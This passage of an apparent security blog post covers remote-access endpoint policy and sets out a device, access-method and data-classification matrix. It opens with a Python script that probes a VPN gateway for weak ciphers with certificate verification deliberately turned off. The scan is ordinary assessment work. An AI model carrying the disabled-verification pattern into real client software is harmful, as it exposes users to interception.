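import ssl

HOST, PORT = "sslvpn.example.com", 443
WEAK_CIPHERS = ["DES-CBC-SHA", "EXP-DES-CBC-SHA", "EXP-RC2-CBC-MD5",
                "EXP-RC4-MD5", "RC4-MD5", "RC4-SHA"]

for cipher in WEAK_CIPHERS:
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE        # we only care about the cipher, not the cert
    try:
        ctx.set_ciphers(cipher)
        with socket.create_connection((HOST, PORT), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
                print("%s: ACCEPTED (%s)" % (cipher, tls.version()))
    except ssl.SSLError:
        print("%s: rejected (by the server or by local OpenSSL)" % cipher)
    except OSError as exc:
        print("%s: connection error: %s" % (cipher, exc))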
Back on track: so, while gateways and protocols may no longer constitute areas of “deep concern”, nowadays “the endpoint” certainly does. When the mentioned standards were written, endpoints were supposed to be mostly company-managed Windows systems. In the meantime most organizations face an “unmanaged mess”, composed of a growing number of smartphones and tablets of all flavors, some – to some degree – company managed, quite some predominantly “free floating”.
And unfortunately there is – to the best of my knowledge – no current (industry) standard laying out how to handle these from a security perspective. Which in turn means that once an “authoritative framework” is needed (be it for policy reasons, be it for assessments using the approach I described above), there’s nothing “to rely on”, but this has to be figured out by the individual organization.
To get a clearer picture I went out contacting some of my ISO colleagues in a “how do you handle this?” manner. In the following I’ll lay out the results, i.e. how mature organizations address the topic, together with some recommendations from our side, based on our usual approach of balancing security and business needs.
At the end of the day the task can be broken down to the question: “which types of endpoints should be allowed which type of access to which (classification level of) data?”.
To answer this one in a comprehensive and consistent way, a number of factors have to be taken into account:
different types of endpoints.
different types of “access methods”.
classification of data to be processed.
potential prerequisites for certain use cases (type of authentication, employee signing an acceptable use policy [AUP], additional [technical] security controls on endpoints and the like).
Classifying types of endpoints
I personally think that the “traditional distinction” between (just) company-managed and non-company-managed – which is used for example in ISO 18028-4 and NIST SP 800-113 – no longer works, but that it makes sense to differentiate roughly between three types of endpoints. To characterize those I quote from a policy I wrote some time ago:
“Company managed device
Any device owned and managed by $COMPANY, e.g. corporate laptops.
Private trustworthy device
Any device that is owned by an individual employee, which is used solely by the named individual and which is kept in an appropriate state as for security controls (up-to-date patch level, anti-malware protection and/or firewall software if feasible etc.). It might be (partly) managed by company driven controls (e.g. configuration policies).
If used for local processing of restricted data appropriate encryption technologies protecting said data must be in place.
In no instance shall any competitors, business partners, and/or other business-relevant parties be allowed to physically access such a device, even if such persons are otherwise related to the employee or are personal friends or acquaintances of the employee. Furthermore information classified ‘strictly confidential’ shall never be processed on this type of device.
Untrusted device
All other devices, for example systems in a cyber café or devices in an employee’s household which are shared with family members or friends.”
Pls note that both NIST SP 800-46r1 (where the party responsible for the security of the device is taken into account, which can be the organization, the teleworker or a third party) and Gartner (classifying into “platform”, “application” and “concierge” types of services) use a similar three-fold classification approach.
Access methods
By “access method” I mean the way the actual data processing is performed. Let’s classify as follows:
“full network access” by means of a tunneled IP connection, provided by a network-stack-like piece of code. This is where the traditional full-blown IPsec or SSL VPN clients come into play.
“application based” access. This includes all HTTP(S) based portals (with MS Outlook Web Access [OWA] being the most prominent example) and the portals provided by typical SSL VPN gateways that enable users to run certain applications (MS Outlook, SAP GUI, File Browsing and the like).
“restricted application based”: same as above but usually without file exchange between remote network and local system, e.g. OWA without attachments, or remote desktop access without use of local drives, no copy+paste in TS client etc.
“(just) presentation logic”: here no actual data processing takes place on the endpoint. The best known example is probably Citrix-based stuff, in different flavors (ICA client, Citrix Receiver, xd-agent et al.).
Classification of data to-be-processed
Another aspect to take into account is the classification of the data that is allowed to be processed on a “remote device”. While this may seem a no-brainer at first glance, in reality this is a tricky one, as most organizations do not have a (“widely used in daily practice”) data classification scheme anyway, and usually a file (or other information entity) has no attributed meta-information that allows easy identification of its classification level, together with a subsequent enforcement of technical controls (which, btw, is one of the main reasons why DLP is so hard to implement correctly; but that could be discussed in more detail in another post 😉).
And, of course, for an employee who has access anyway it’s usually technically easy to process higher classified data “than allowed”. The most common approach to addressing this is having the employees sign AUPs prohibiting this/such type of handling, combined with some liability in case of breaches of such data (this approach, again, might be a minefield in itself, depending on the part of the world and the associated juridical system you’re [located] in ;-)).
For the following discussion let’s assume that organizations use a scale of four classifications/ classes designated SC0 to SC3 (where SC = “security class” or “security classification”) with 3 being the highest (e.g. “strictly confidential” or “top secret”) and 0 being the lowest (e.g. “public”, “unclassified”).
Prerequisites for certain use cases
Frequently, additional organizational or technical prerequisites are imposed for certain use cases (e.g. types of devices, potentially in combination with certain access methods). In this space one can find:
Acceptable Use Policies (AUPs) prescribing what can or should be done, which lay out “prohibited practices” (that might still be technically possible, see above), the handling of backups, the separation of business and private use etc.
the level of authentication required for certain usage scenarios.
additional security controls on the endpoint (anti-malware, local firewall, local disk/file/container encryption and the like), with their presence on the endpoint potentially verified by some “host integrity checking” technology, e.g. “UAC” in Juniper space. In this context it should be noted that in most environments UAC or similar approaches from other vendors do not provide an actual security benefit (“enforce that only a trustworthy and secure endpoint can connect”) but simply differentiate between “company managed” and “unmanaged” in the way “look for a certain registry key and if present assume that’s a company managed device” (“no idea if the associated piece of security software is really present, let alone correctly configured, not to mention that it provides any actual security benefit”…).
Putting it all together
Now, putting all this together I came up with the following table. It displays what we feel is “common best security practice” nowadays for handling remote access (endpoint) security, balancing business and security needs (a small code sketch of the same logic follows the table):
Row 1 – Type of device: company managed
  Classification of data (allowed) to be processed: usually all; some organizations do not allow the highest classification on mobile devices at all.
  Allowed access methods: all.

Row 2 – Type of device: private trustworthy (which means, as per the definition above, disposing of appropriate capabilities/controls)
  Classification of data (allowed) to be processed: depends; some organizations do not allow the highest classification in this scenario. We recommend: no SC3 here.
  Allowed access methods: usually all, but “application based” preferred over full network connect.
  Prerequisites: MFA, appropriate capabilities, sometimes AUP.

Row 3 – Type of device: all (others), including “private” devices without appropriate capabilities (e.g. apps on iPads that do not use the “data protection” feature)
  Classification of data (allowed) to be processed: SC3 not allowed at all. In case of SC2: no data processing on the device, only presentation logic; prerequisites: MFA, employee-signed AUP. For SC0/SC1 only: “restricted application based” recommended.

Row 4 – Type of device: all others when gateway-deployed sandbox technologies (e.g. Juniper Secure Virtual Storage for Win32 systems) are used
  Classification of data (allowed) to be processed: depends, usually something in the range SC0–SC2, pretty much never SC3. We recommend: no SC3.
  Allowed access methods: “application based”.
  Prerequisites: MFA, employee-signed AUP.
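If you want to make this matrix “executable”, e.g. to replace yet another spreadsheet, a rough sketch could look like the following; the encoding is my own simplified reading of the table above and certainly not an authoritative policy:

# Rough sketch: the matrix above as a lookup. Device types follow the three-fold
# classification from this post plus the sandbox case; SC levels range from 0 to 3.
def allowed_access(device, sc):
    """Return (allowed access methods, prerequisites) or None if access is not allowed."""
    if device == "company_managed":
        # usually all; some organizations exclude the highest level on mobile devices
        return (["full network access", "application based",
                 "restricted application based", "presentation logic"], [])
    if device == "private_trustworthy":
        if sc == 3:
            return None                     # our recommendation: no SC3 here
        return (["application based (preferred)", "full network access"],
                ["MFA", "appropriate capabilities", "AUP (sometimes)"])
    if device == "untrusted_with_gateway_sandbox":
        if sc == 3:
            return None
        return (["application based"], ["MFA", "employee-signed AUP"])
    # all other ("untrusted") devices, e.g. without appropriate capabilities
    if sc == 3:
        return None
    if sc == 2:
        return (["presentation logic only"], ["MFA", "employee-signed AUP"])
    return (["restricted application based (recommended)"],
            ["MFA", "employee-signed AUP"])

print(allowed_access("private_trustworthy", 2))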
Pls note: evidently, “everything else” (other combinations of devices, access methods or data classification levels to be processed) can be implemented as well (and this actually happens in environments I regularly work in). I mean, “infosec follows, supports and enables business”. It’s just that – from our perspective – a risk acceptance is needed then 😉
So, this is what I finally took as the “baseline to evaluate the actual implementation against” (for the “endpoint” category) in the course of that assessment mentioned in the beginning of the post. Hopefully laying out the sources of input, the classifications and the rationale leading to certain restrictions turns out to be helpful for some of you, dear readers.